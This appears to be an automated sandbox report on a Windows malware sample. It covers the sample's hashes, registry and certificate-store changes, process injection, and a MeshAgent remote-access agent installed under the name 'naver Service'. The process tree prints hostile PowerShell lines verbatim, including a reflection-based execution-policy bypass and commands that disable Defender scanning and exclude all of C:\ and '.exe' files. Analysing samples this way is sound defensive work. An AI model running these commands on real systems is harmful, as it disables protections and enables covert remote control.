Analysis
max time kernel: 94s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-09-2024 22:46
Static task: static1
Behavioral task: behavioral1
Sample: 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
Resource: win7-20240903-en
General
Target: 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
Size: 19.0MB
MD5: c48e8edc68378461a358bf76afb2cb50
SHA1: 1457f5eda579ad7b4772e16378e1d6de312b66c3
SHA256: eae7ea70c95f35b473b9ae7cba6079b6b26d15f4c7167d7119ed4cb0afd7880b
SHA512: 77a90eac1d5ab5d59a3c6b0ed8d3700edbfd6096b4c6fa8b03f8802b22234cc384aa7f58b115435629649655fac4144e6d78aaa21e68e2e930e09214b9885bd4
SSDEEP: 196608:XDfS4aFBcMkZbmna1cCwvylAjWZ0Xq9YLuxMfCVb2:faF/CinaqtvylAjWZ0Xq9YLuxMfCVb2
Malware Config
Signatures
Detects MeshAgent payload (1 IoC)
Processes:
resource: C:\Users\Admin\AppData\Local\naver\naver.exe
yara_rule: family_meshagent
Blocklisted process makes network request (4 IoCs)
Processes:
flow | pid | process
21 | 1308 | powershell.exe
23 | 1308 | powershell.exe
24 | 1308 | powershell.exe
26 | 1308 | powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
pid | process
376 | powershell.exe
1272 | powershell.exe
3908 | powershell.exe
Sets service image path in registry (2 TTPs, 1 IoC)
Processes:
description: Set value (str)
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\""
process: naver.exe
Executes dropped EXE (2 IoCs)
Processes:
pid | process
4776 | naver.exe
2804 | naver.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops file in System32 directory (64 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\msvcrt.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\sechost.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\ole32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ncrypt.pdb | naver.exe
File opened for modification | C:\Windows\System32\shcore.pdb | naver.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ADA331FC360B85096B3D4FAF288FDD1D04FB7A14 | naver.exe
File opened for modification | C:\Windows\System32\comctl32.pdb | naver.exe
File opened for modification | C:\Windows\System32\gdi32full.pdb | naver.exe
File opened for modification | C:\Windows\System32\sechost.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\gdiplus.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\shcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\dbghelp.pdb | naver.exe
File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | naver.exe
File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\MeshService64.pdb | naver.exe
File opened for modification | C:\Windows\System32\exe\MeshService64.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\msvcrt.pdb | naver.exe
File opened for modification | C:\Windows\System32\crypt32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\Kernel.Appcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\bcryptprimitives.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\comctl32.pdb | naver.exe
File opened for modification | C:\Windows\System32\win32u.pdb | naver.exe
File opened for modification | C:\Windows\System32\advapi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\combase.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | naver.exe
File opened for modification | C:\Windows\System32\dbghelp.pdb | naver.exe
File opened for modification | C:\Windows\System32\ole32.pdb | naver.exe
File opened for modification | C:\Windows\System32\bcryptprimitives.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\rpcrt4.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\gdi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\gdi32full.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\bcryptprimitives.pdb | naver.exe
File opened for modification | C:\Windows\System32\kernel32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\System32\gdiplus.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\shcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | naver.exe
File opened for modification | C:\Windows\System32\ucrtbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\ucrtbase.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\win32u.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | naver.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\7C06307051CE49A02C8C573D5C09C3B54155978E | naver.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\0F4A5A7334D662892CB618A9EE12A94795B8204D | naver.exe
File opened for modification | C:\Windows\System32\dll\crypt32.pdb | naver.exe
File opened for modification | C:\Windows\System32\gdi32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\shell32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\DLL\dbgcore.pdb | naver.exe
File opened for modification | C:\Windows\System32\DLL\kernel32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\rpcrt4.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\ncrypt.pdb | naver.exe
File opened for modification | C:\Windows\System32\ws2_32.pdb | naver.exe
File opened for modification | C:\Windows\System32\symbols\dll\user32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\ole32.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\gdiplus.pdb | naver.exe
File opened for modification | C:\Windows\System32\iphlpapi.pdb | naver.exe
File opened for modification | C:\Windows\System32\dll\combase.pdb | naver.exe
Modifies data under HKEY_USERS (52 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | naver.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | naver.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | naver.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | naver.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | naver.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716916123641421" | naver.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Modifies system certificate store
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
pid | process
1984 | powershell.exe
1984 | powershell.exe
1308 | powershell.exe
376 | powershell.exe
1308 | powershell.exe
376 | powershell.exe
4964 | msedge.exe (this entry is repeated 58 times in the report)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 1984 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1984 | powershell.exe
Token: SeSecurityPrivilege | 1984 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1984 | powershell.exe
Token: SeLoadDriverPrivilege | 1984 | powershell.exe
Token: SeSystemProfilePrivilege | 1984 | powershell.exe
Token: SeSystemtimePrivilege | 1984 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1984 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1984 | powershell.exe
Token: SeCreatePagefilePrivilege | 1984 | powershell.exe
Token: SeBackupPrivilege | 1984 | powershell.exe
Token: SeRestorePrivilege | 1984 | powershell.exe
Token: SeShutdownPrivilege | 1984 | powershell.exe
Token: SeDebugPrivilege | 1984 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1984 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1984 | powershell.exe
Token: SeUndockPrivilege | 1984 | powershell.exe
Token: SeManageVolumePrivilege | 1984 | powershell.exe
Token: 33 | 1984 | powershell.exe
Token: 34 | 1984 | powershell.exe
Token: 35 | 1984 | powershell.exe
Token: 36 | 1984 | powershell.exe
Token: SeDebugPrivilege | 1308 | powershell.exe
Token: SeDebugPrivilege | 376 | powershell.exe
Token: SeDebugPrivilege | 4964 | msedge.exe
Token: SeDebugPrivilege | 2812 | msedge.exe
Token: SeDebugPrivilege | 1272 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 4664 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4664 | wmic.exe
Token: SeSecurityPrivilege | 4664 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4664 | wmic.exe
Token: SeLoadDriverPrivilege | 4664 | wmic.exe
Token: SeSystemtimePrivilege | 4664 | wmic.exe
Token: SeBackupPrivilege | 4664 | wmic.exe
Token: SeRestorePrivilege | 4664 | wmic.exe
Token: SeShutdownPrivilege | 4664 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4664 | wmic.exe
Token: SeUndockPrivilege | 4664 | wmic.exe
Token: SeManageVolumePrivilege | 4664 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 4664 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 4664 | wmic.exe
Token: SeSecurityPrivilege | 4664 | wmic.exe
Token: SeTakeOwnershipPrivilege | 4664 | wmic.exe
Token: SeLoadDriverPrivilege | 4664 | wmic.exe
Token: SeSystemtimePrivilege | 4664 | wmic.exe
Token: SeBackupPrivilege | 4664 | wmic.exe
Token: SeRestorePrivilege | 4664 | wmic.exe
Token: SeShutdownPrivilege | 4664 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 4664 | wmic.exe
Token: SeUndockPrivilege | 4664 | wmic.exe
Token: SeManageVolumePrivilege | 4664 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 3992 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 3992 | wmic.exe
Token: SeSecurityPrivilege | 3992 | wmic.exe
Token: SeTakeOwnershipPrivilege | 3992 | wmic.exe
Token: SeLoadDriverPrivilege | 3992 | wmic.exe
Token: SeSystemtimePrivilege | 3992 | wmic.exe
Token: SeBackupPrivilege | 3992 | wmic.exe
Token: SeRestorePrivilege | 3992 | wmic.exe
Token: SeShutdownPrivilege | 3992 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 3992 | wmic.exe
Token: SeUndockPrivilege | 3992 | wmic.exe
Token: SeManageVolumePrivilege | 3992 | wmic.exe
Token: SeAssignPrimaryTokenPrivilege | 3992 | wmic.exe
Suspicious use of WriteProcessMemory (32 IoCs)
Processes:
description | pid | process | target process
PID 4988 wrote to memory of 1984 | 4988 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4988 wrote to memory of 1984 | 4988 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4988 wrote to memory of 1308 | 4988 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4988 wrote to memory of 1308 | 4988 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4988 wrote to memory of 376 | 4988 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 4988 wrote to memory of 376 | 4988 | 2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe | powershell.exe
PID 1308 wrote to memory of 4964 | 1308 | powershell.exe | msedge.exe
PID 1308 wrote to memory of 4964 | 1308 | powershell.exe | msedge.exe
PID 1308 wrote to memory of 4964 | 1308 | powershell.exe | msedge.exe
PID 1308 wrote to memory of 4964 | 1308 | powershell.exe | msedge.exe
PID 4964 wrote to memory of 2812 | 4964 | msedge.exe | msedge.exe
PID 4964 wrote to memory of 2812 | 4964 | msedge.exe | msedge.exe
PID 4964 wrote to memory of 2812 | 4964 | msedge.exe | msedge.exe
PID 4964 wrote to memory of 2812 | 4964 | msedge.exe | msedge.exe
PID 2812 wrote to memory of 1272 | 2812 | msedge.exe | powershell.exe
PID 2812 wrote to memory of 1272 | 2812 | msedge.exe | powershell.exe
PID 2812 wrote to memory of 4776 | 2812 | msedge.exe | naver.exe
PID 2812 wrote to memory of 4776 | 2812 | msedge.exe | naver.exe
PID 2804 wrote to memory of 4664 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 4664 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 3992 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 3992 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 4196 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 4196 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 1368 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 1368 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 2316 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 2316 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 4512 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 4512 | 2804 | naver.exe | wmic.exe
PID 2804 wrote to memory of 3908 | 2804 | naver.exe | powershell.exe
PID 2804 wrote to memory of 3908 | 2804 | naver.exe | powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe (tree level 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe"
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID: 4988
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2)
    Command line: powershell " # chcp 65001 > $null; # <-- not working; [Console]::OutputEncoding = [Text.Encoding]::UTF8; # 👈 add this at begin; Get-NetAdapter | foreach { $_ | Select-Object -Property ifAlias, InstanceID } | ConvertTo-Json"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1984
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2)
    Command line: powershell -
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1308
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 3)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4964
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (tree level 4)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2812
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 5)
    Command line: powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID: 1272
C:\Users\Admin\AppData\Local\naver\naver.exe (tree level 5)
    Command line: C:\Users\Admin\AppData\Local\naver\naver.exe -install
    - Sets service image path in registry
    - Executes dropped EXE
    PID: 4776
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 376
-
C:\Users\Admin\AppData\Local\naver\naver.exe (tree level 1)
    Command line: "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory
    PID: 2804
C:\Windows\System32\wbem\wmic.exe (tree level 2)
    Command line: wmic SystemEnclosure get ChassisTypes
    - Suspicious use of AdjustPrivilegeToken
    PID: 4664
C:\Windows\system32\wbem\wmic.exe (tree level 2)
    Command line: wmic os get oslanguage /FORMAT:LIST
    - Suspicious use of AdjustPrivilegeToken
    PID: 3992
C:\Windows\System32\wbem\wmic.exe (tree level 2)
    Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
    PID: 4196
C:\Windows\system32\wbem\wmic.exe (tree level 2)
    Command line: wmic os get oslanguage /FORMAT:LIST
    PID: 1368
C:\Windows\System32\wbem\wmic.exe (tree level 2)
    Command line: wmic SystemEnclosure get ChassisTypes
    PID: 2316
C:\Windows\System32\wbem\wmic.exe (tree level 2)
    Command line: wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
    PID: 4512
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2)
    Command line: powershell -noprofile -nologo -command -
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID: 3908
Network
MITRE ATT&CK Enterprise v15
Downloads